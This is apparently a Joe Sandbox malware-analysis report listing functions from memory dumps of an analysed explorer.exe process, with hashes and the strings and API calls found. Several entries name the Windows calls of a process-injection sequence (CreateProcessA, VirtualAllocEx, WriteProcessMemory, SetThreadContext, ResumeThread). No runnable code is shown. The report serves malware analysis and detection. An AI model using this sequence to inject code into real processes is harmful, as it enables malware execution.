Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb08c9840c6fcd96d32a669786524c438a3cd36d8114555e2cee813f7db60ba
Instruction ID: af359316cb2863a8ce913f3ca09352ed2c9f2e238d44ca2dc817ed1d6ec35164
Opcode Fuzzy Hash: 5fb08c9840c6fcd96d32a669786524c438a3cd36d8114555e2cee813f7db60ba
Instruction Fuzzy Hash: 27E08C308482089FC302CFE4DC84BAABBB8AB0B305F0800D5E40897261DB306E95DB55

Uniqueness

Uniqueness Score: -1.00%

Function 002B8EA8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d97598c9e9a165d71624458fd9e30bdcfecd0f817dc701bc73ab81d442ff903
Instruction ID: 58c6c186bf457d8af203e2a7ae7221dc3142b75f1748560206f72d04cf25f86e
Opcode Fuzzy Hash: 6d97598c9e9a165d71624458fd9e30bdcfecd0f817dc701bc73ab81d442ff903
Instruction Fuzzy Hash: A7F0F8B091012ACBDB20DF64E844BADB3B4FB15304F504DA5D019E3240DB745A848F14

Uniqueness

Uniqueness Score: -1.00%

Function 05F06380 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288992ba579b71e8e62cfe50d61fcd55ddd45a6276e105308ab0eb2e0c455fb5
Instruction ID: 091f4a46d0f9a76b0daace8dee3cad11c79a60c7f7276cc82658ae3409191554
Opcode Fuzzy Hash: 288992ba579b71e8e62cfe50d61fcd55ddd45a6276e105308ab0eb2e0c455fb5
Instruction Fuzzy Hash: 8FE0C274E04208EFCB44DFA8D940A9CFBB4EB88304F14C0AAD918A3340D735AA51DF80

Uniqueness

Uniqueness Score: -1.00%

Function 05F06119 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7c1084bc7ed614e97dda43bcf00876df529d0f8307900a7ff08d273c97dbb8
Instruction ID: 1eb5d4d24bc0ca4928a6abb59b7efd3ddfd9d373c53aa00288dc0cdde4918a3d
Opcode Fuzzy Hash: 4f7c1084bc7ed614e97dda43bcf00876df529d0f8307900a7ff08d273c97dbb8
Instruction Fuzzy Hash: 91E01A71D1A248DFCB51EFB8D99428CBFB0AF45205F1444EEC848E36A2EB344A95DB12

Uniqueness

Uniqueness Score: -1.00%

Function 05F06AA3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47b3be1b65cc1307f768fc59dc4c2bf878d86a2d097bca0eb36be9ab8beba298
Instruction ID: c82d92701ede23cc5cb204aa064b6c5b5d1f498182f8b9e9829a6f1c11ee7e6b
Opcode Fuzzy Hash: 47b3be1b65cc1307f768fc59dc4c2bf878d86a2d097bca0eb36be9ab8beba298
Instruction Fuzzy Hash: 2BE04F34904108ABCB04EF94D981ADCBB75EB95314F6480A9D90423381DB32AA56EA84

Uniqueness

Uniqueness Score: -1.00%

Function 002B2BBE Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d941fcd135244d5e58fb036d6a3914221a7768cbc46d743cff122af3a7f9d3
Instruction ID: 86aa6e399088b7e9f67817b5a6aef4af5eed7adec0c3d63a0d9255d2c10407c2
Opcode Fuzzy Hash: f2d941fcd135244d5e58fb036d6a3914221a7768cbc46d743cff122af3a7f9d3
Instruction Fuzzy Hash: 01E01739B38129CBCF04CFD8D8408FDF3B8FB59399B246811D409A7205D770A9299B50

Uniqueness

Uniqueness Score: -1.00%

Function 002B9C38 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7f954e7a48889614b83b01b64c5f36bbf9cbda35440c2e8b2ed435875a9de0
Instruction ID: 3d78e611ee34018010eeee4fb005daac2ae91083ae4f766ba72398265646181b
Opcode Fuzzy Hash: 8e7f954e7a48889614b83b01b64c5f36bbf9cbda35440c2e8b2ed435875a9de0
Instruction Fuzzy Hash: 58E07574E04208AFCB44DFA8D94569DFBF4EB88304F1481AAD91893351D7359A91DF81

Uniqueness

Uniqueness Score: -1.00%

Function 05F003A8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b17ca1cf93b2e712d31f081cde1a091099398510db588b9f213df61edf4523
Instruction ID: 93b17bbdf3779ca1e23670223a213500c85838b522b1cf9be152cfc331e69b13
Opcode Fuzzy Hash: 64b17ca1cf93b2e712d31f081cde1a091099398510db588b9f213df61edf4523
Instruction Fuzzy Hash: EBF0F834904268CFDB30CF54C84CBDABBB5BB06305F4894D9C408AB281CB788A84DF21

Uniqueness

Uniqueness Score: -1.00%

Function 002B25F0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ece8f5694e6e12275e32ef4fe5ecf73adbc954e351f08dae2f74cf92bfe501a
Instruction ID: 2202450925c269fe349361271f03df62e556fa06505a75974c6a0d3ce2f2b0f4
Opcode Fuzzy Hash: 5ece8f5694e6e12275e32ef4fe5ecf73adbc954e351f08dae2f74cf92bfe501a
Instruction Fuzzy Hash: 0EE0B674D0424CEFCB44DFE8E88469EBBF4EB48305F1081A9D818A3350EB345A94DF81

Uniqueness

Uniqueness Score: -1.00%

Function 05F09930 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aece74af0bc8aa118df69d568119c98c34263ea150c75cbf7ba8ae212ab83304
Instruction ID: 2c745a6643448336418f2787c6e9497e53f814887651bb1fb11fd40811802a8d
Opcode Fuzzy Hash: aece74af0bc8aa118df69d568119c98c34263ea150c75cbf7ba8ae212ab83304
Instruction Fuzzy Hash: 98E01A74D04208AFCB04DF98D541AACFBB5EB88314F14C0AADD4463381D7359A51EB84

Uniqueness

Uniqueness Score: -1.00%

Function 002B71E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84b7dfd4ec302eede04109fdec115068cc1402dfc10f3b2a693d602f119bba9
Instruction ID: 77d251c0e0c5c72f1ec78c3c95c88b268859b2fa06c741bc402d8330f057caa3
Opcode Fuzzy Hash: e84b7dfd4ec302eede04109fdec115068cc1402dfc10f3b2a693d602f119bba9
Instruction Fuzzy Hash: 56D01271819108EBCB11DFF8D9046DEB7B9EB49305F1141A5D50997260EF314A90DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05F06AA8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 783a1639033f8ef75144d321bbf4bbb39a3727c697a7d57b9baaaeea7c8a824c
Instruction ID: 3910fe23a0f6eb270460038420997d0f898ddf992b013eb435fee6a0a4ebf8d9
Opcode Fuzzy Hash: 783a1639033f8ef75144d321bbf4bbb39a3727c697a7d57b9baaaeea7c8a824c
Instruction Fuzzy Hash: D2E08C34904208EBCB04EF94D940A9CFB74FB84314F24C0A9DD0423380D732AEA2EA84

Uniqueness

Uniqueness Score: -1.00%

Function 05F06128 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fea3c800370f4cb5cd4d0a6fc138be4a202625cd4b63c436c603c84a442babc
Instruction ID: c0516ed1248c69b7601b65d62089f999f0e697ed44ada7aa884e14aa907ddc82
Opcode Fuzzy Hash: 9fea3c800370f4cb5cd4d0a6fc138be4a202625cd4b63c436c603c84a442babc
Instruction Fuzzy Hash: 07E0E270D15208AFCB40EFA8D94969CBBB4AB44206F1040A9C909A3390EB705A90DB81

Uniqueness

Uniqueness Score: -1.00%

Function 002B27B9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 841358d5f7cf389848f067e67047d442b031e268843e5d25f04f1a515eb7e460
Instruction ID: 8144ba2dbc619983dc5e7cc48552b24f3a32d02ad49654513086d714d749a2dd
Opcode Fuzzy Hash: 841358d5f7cf389848f067e67047d442b031e268843e5d25f04f1a515eb7e460
Instruction Fuzzy Hash: C0D05E74D1C748CFDB44CFF680415EDBFB9AF6A380B25942DC029E7662D67041599F01

Uniqueness

Uniqueness Score: -1.00%

Function 002B2C78 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d17fbd6d4077abbfe5efb1452902d3e16cbc12d721a214908234b6a27e4bc74
Instruction ID: 6b8c3848692bf8ce62663d2f91cc600f98b75da8788f0da004b460b8409b65a1
Opcode Fuzzy Hash: 8d17fbd6d4077abbfe5efb1452902d3e16cbc12d721a214908234b6a27e4bc74
Instruction Fuzzy Hash: 44C08C21D6E384CBCB028E7018920F97F3C8A13341B1665DBC809D3253E006082E92E2

Uniqueness

Uniqueness Score: -1.00%

Function 002B15D8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63ca24c04d49c18f5aebf4453c495c3713ca37a5596a9c2136e09fe24923338
Instruction ID: b441ff21ebf654ea4ee46d4f74dff94275daf5824875004355c8493337473321
Opcode Fuzzy Hash: c63ca24c04d49c18f5aebf4453c495c3713ca37a5596a9c2136e09fe24923338
Instruction Fuzzy Hash: 20D012B0C1520C9BC714AFF4BA092ADBF7CE742306F5051A9E80923650DB3055E4E7A7

Uniqueness

Uniqueness Score: -1.00%

Function 002B0728 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d54125ec0eb287794efccd9f5a971ed06faa749f7eae2a35bf9a18c23bce0c
Instruction ID: 96d92d5e9dba87ea42af67d5a543525c7708d7724baa121cfaa767ed19f1960d
Opcode Fuzzy Hash: e4d54125ec0eb287794efccd9f5a971ed06faa749f7eae2a35bf9a18c23bce0c
Instruction Fuzzy Hash: 74D0127081020DDBD704DFD4EC49BAEF77CD746306F104198A80863660DF316D94EA95

Uniqueness

Uniqueness Score: -1.00%

Function 002B1C40 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad1bd51d563419e1db5fc9f969bc6fb7de0ab105b31925bb48d4fdf4ccfc0d6
Instruction ID: 1ff71ae780b7bfcbdec4b64005d917d8368575390f63e86897d054b05ba9cc7d
Opcode Fuzzy Hash: 1ad1bd51d563419e1db5fc9f969bc6fb7de0ab105b31925bb48d4fdf4ccfc0d6
Instruction Fuzzy Hash: 3ED06774E2920ADFCF10CFA9D490AEDBBB4BF09340B60511AA915E3211D7709960DF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 1248, Parent PID: 904COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	0

Executed Functions

Function 001F07E0 Relevance: 9.6, Strings: 7, Instructions: 827
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TNGp, xrefs: 001F0D9F
TNGp, xrefs: 001F11C9
TNGp, xrefs: 001F0B45
TNGp, xrefs: 001F1029
TNGp, xrefs: 001F0C7F
TNGp, xrefs: 001F09A7
TNGp, xrefs: 001F0EF2

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID: TNGp$TNGp$TNGp$TNGp$TNGp$TNGp$TNGp
API String ID: 0-248060045
Opcode ID: 952588332318a6d70649d0661753bc8a9d25476a364b4a12f5ad61fd6a5af1ff
Instruction ID: a7cfedd0f4efd4bf422ece5d196ce3c1318b7bae6ff0619283ea99f7367122f6
Opcode Fuzzy Hash: 952588332318a6d70649d0661753bc8a9d25476a364b4a12f5ad61fd6a5af1ff
Instruction Fuzzy Hash: CE82D434A10218CFD714DF64C895FA9B7B1BF8A304F1185E9E949AB360EB70AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001F00C8 Relevance: 9.6, Strings: 7, Instructions: 826
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TNGp, xrefs: 001F0D9F
TNGp, xrefs: 001F11C9
TNGp, xrefs: 001F0B45
TNGp, xrefs: 001F1029
TNGp, xrefs: 001F0C7F
TNGp, xrefs: 001F09A7
TNGp, xrefs: 001F0EF2

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID: TNGp$TNGp$TNGp$TNGp$TNGp$TNGp$TNGp
API String ID: 0-248060045
Opcode ID: 349817d332c29d196ab25eaf29aabc4961a82d6accda7888f412d3ffdf195e4f
Instruction ID: 6fdfe30e2979e90a42f0212aa71fce8371e059dfba98cff36f67af5ed1c99b09
Opcode Fuzzy Hash: 349817d332c29d196ab25eaf29aabc4961a82d6accda7888f412d3ffdf195e4f
Instruction Fuzzy Hash: E082E434A10218CFD724DF64C895FA9B7B1BF8A304F1185E9E949AB360EB70AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001F7650 Relevance: 2.2, Strings: 1, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 001F7B22

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID: UUUU
API String ID: 0-1798160573
Opcode ID: 425b47b83cd42401430d29f3a375f2573072210f41f0e3d63e3ce896661984b6
Instruction ID: 3a6227df1e10bc2d3d1fab728eb64738327b82d497cf8cd5e4d3c9a34deb7223
Opcode Fuzzy Hash: 425b47b83cd42401430d29f3a375f2573072210f41f0e3d63e3ce896661984b6
Instruction Fuzzy Hash: 6EA2D674A04628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01327AF0 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01327DB7

Memory Dump Source

Source File: 0000001D.00000002.1031780887.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1320000_explorer.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1fc21d54faa8b951eac466833aa30f5904cc14d0f399328ee08b230a22db1a8b
Instruction ID: a2d8083b92772b9b8cd8303e096b662b0f1f979cd8571020fc8d281797ea9ac4
Opcode Fuzzy Hash: 1fc21d54faa8b951eac466833aa30f5904cc14d0f399328ee08b230a22db1a8b
Instruction Fuzzy Hash: 61C13270D042698FDF20DFA8C841BEEBBB1BF58308F1495A9D909B7240DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 013276C8 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0132779B

Memory Dump Source

Source File: 0000001D.00000002.1031780887.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1320000_explorer.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 286b5f4238985bd99e63e582ea62cb4ad80a0f46cbd89be59690f24e68a72f3a
Instruction ID: 455622d426aa02025f695564a82216d2aac07d607fdc3ae9262223df32f4cb6d
Opcode Fuzzy Hash: 286b5f4238985bd99e63e582ea62cb4ad80a0f46cbd89be59690f24e68a72f3a
Instruction Fuzzy Hash: EE419BB5D012589FCF00CFA9D984AEEFBF1BB49314F20942AE915B7240D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01327858 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0132790A

Memory Dump Source

Source File: 0000001D.00000002.1031780887.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1320000_explorer.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1b6decf6b959c6bc108e22df97cbc08f0b6a3f318da1722de18730c7ccd160f3
Instruction ID: 5f7fe5ea692e563d1f5f8de427af6cbb501a7a9a551d0b45eedd332304e3297a
Opcode Fuzzy Hash: 1b6decf6b959c6bc108e22df97cbc08f0b6a3f318da1722de18730c7ccd160f3
Instruction Fuzzy Hash: 0D41B8B8D042589FCF10CFA9D884AEEFBB1BB49314F20942AE915B7200D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 01327570 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0132761A

Memory Dump Source

Source File: 0000001D.00000002.1031780887.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1320000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4fbadbb4c6d4540762d85753ac6937e84e1c41a5080bfd01fb64ff12e1b680d6
Instruction ID: 60e6cbab22aec8229c99dc583a07b82825db1808ef460a2f9752337ae539beca
Opcode Fuzzy Hash: 4fbadbb4c6d4540762d85753ac6937e84e1c41a5080bfd01fb64ff12e1b680d6
Instruction Fuzzy Hash: DE4197B8D042589BCF10CFA9D884AEEFBB1FB59314F20942AE915B7200D735A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01327380 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0132742F

Memory Dump Source

Source File: 0000001D.00000002.1031780887.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1320000_explorer.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 012b28fe2d509af03b3bb65da8f051b01f9cce1471fa392eb3324bbe69231447
Instruction ID: ef7a02035e3862631e4df403d2f1884f6c8adde0bcc0ae7aa56172d1d5fe0119
Opcode Fuzzy Hash: 012b28fe2d509af03b3bb65da8f051b01f9cce1471fa392eb3324bbe69231447
Instruction Fuzzy Hash: 3441BBB4D012589FCB10DFA9D884AEEFBF1BF49318F24842AE519B7240D738A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01327260 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 013272DE

Memory Dump Source

Source File: 0000001D.00000002.1031780887.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1320000_explorer.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ca751fa8add8d8a9d19eafaab166a81570ba2643af86f5bdd47aa7f4c7b073f2
Instruction ID: 7fb74213ac24a3f1db7148d002ea744142b6cc23aafebc42b8e5ede5127abd60
Opcode Fuzzy Hash: ca751fa8add8d8a9d19eafaab166a81570ba2643af86f5bdd47aa7f4c7b073f2
Instruction Fuzzy Hash: CC31BBB4D012189FCF14CFA9D884AAEFBB4FB49318F20941AE915B7300DB35A905CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001F1FC0 Relevance: 1.4, Strings: 1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\-<l, xrefs: 001F2036

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID: \-<l
API String ID: 0-2818436665
Opcode ID: 88a445558fedde12cf6ac610c0a30e9ffa0c24ecfd0723312e80ca36640c4c14
Instruction ID: 05e254e7d1561414df99c204d78fdec7e6b9fb460366bbe31375804954005094
Opcode Fuzzy Hash: 88a445558fedde12cf6ac610c0a30e9ffa0c24ecfd0723312e80ca36640c4c14
Instruction Fuzzy Hash: 8D510574E09208CFDB18CFA5D444BFDBBB6AF8A300F249029E606BB360DB745945DB54

Uniqueness

Uniqueness Score: -1.00%

Function 055012DD Relevance: 1.3, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J, xrefs: 05501342

Memory Dump Source

Source File: 0000001D.00000002.1034247432.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5500000_explorer.jbxd

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: 6f4e71361150fe30683f102802c9fcfe6bb18137aded01589d50a2555e634d20
Instruction ID: e8f5be0f218efa5d6096c8e3b71bd5da8e02d819d4d2760f695119865f83bdaf
Opcode Fuzzy Hash: 6f4e71361150fe30683f102802c9fcfe6bb18137aded01589d50a2555e634d20
Instruction Fuzzy Hash: F5F0C9B098016ACFDBA4DF24CE88BB9B7B1BB45305F4044E5D11DA6290CB340E84CF15

Uniqueness

Uniqueness Score: -1.00%

Function 001F8EA8 Relevance: 1.3, Strings: 1, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t5^, xrefs: 001F8EA8

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID: t5^
API String ID: 0-2187044827
Opcode ID: 68bf5b77d5e6b44a7b3bdf8e8b58ecf7206fe34305ce425caec7361929b6ac4e
Instruction ID: 720340ba26aa052e09e08eb4bd4613eb4dc2fa33586422a1a2ab2c7671572192
Opcode Fuzzy Hash: 68bf5b77d5e6b44a7b3bdf8e8b58ecf7206fe34305ce425caec7361929b6ac4e
Instruction Fuzzy Hash: 94F0F2B0A0012ECBDB20EF64D894BBEB7B0FB14300F5049A6E115A3380DB305A848F55

Uniqueness

Uniqueness Score: -1.00%

Function 001F0094 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 502925eede5d1517d61b9df4625ab35428a59a234d533e94d074c5c57cc0a686
Instruction ID: 8ef2ea4f2128c50a0b1f3475135982f2a4000ec9ef98e758188eacd67eaeea9e
Opcode Fuzzy Hash: 502925eede5d1517d61b9df4625ab35428a59a234d533e94d074c5c57cc0a686
Instruction Fuzzy Hash: 4D513A74E045099FCB09DFA4D891AEEB7B2FF8C304F208869E915A7364DB316D51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F04D0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172d8cddc0fb85ab80057029e1e190eca3ba6490d4aa4fd171e168fd52a7978e
Instruction ID: fa4203e671e31f491e00c6e067b31a4972bfb19b4fc4897c1287e2f461f13e2e
Opcode Fuzzy Hash: 172d8cddc0fb85ab80057029e1e190eca3ba6490d4aa4fd171e168fd52a7978e
Instruction Fuzzy Hash: E2515A74E042099FCB09DFA4D841AEEFBB2FF89300F108869E515A73A5DB315D41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001F70E7 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32bc804d7714268c945648ae943bf11a4e433b80313b45bdc3a3e857a254e67b
Instruction ID: d088570c24504d452634e4eb2d04cc4f1393cb42ef10219235c508bda9ff6f02
